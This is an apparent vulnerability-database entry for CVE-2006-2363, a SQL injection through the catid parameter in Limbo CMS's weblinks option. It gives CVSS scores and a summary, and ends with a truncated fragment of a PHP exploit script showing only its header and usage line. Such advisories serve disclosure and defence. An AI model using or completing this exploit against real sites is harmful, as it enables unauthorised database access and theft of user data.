5.1
CVSSv2

CVE-2006-2363

Published: 15/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the weblinks option (weblinks.html.php) in Limbo CMS allows remote malicious users to execute arbitrary SQL commands via the catid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

limbo cms limbo cms 1.0.4.2

Exploits

<pre> [i] Limbo CMS (option=weblinks) sql injection exploit [i] coded by [Oo] <?php if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id']))) { ?> [*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id] [*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127 ...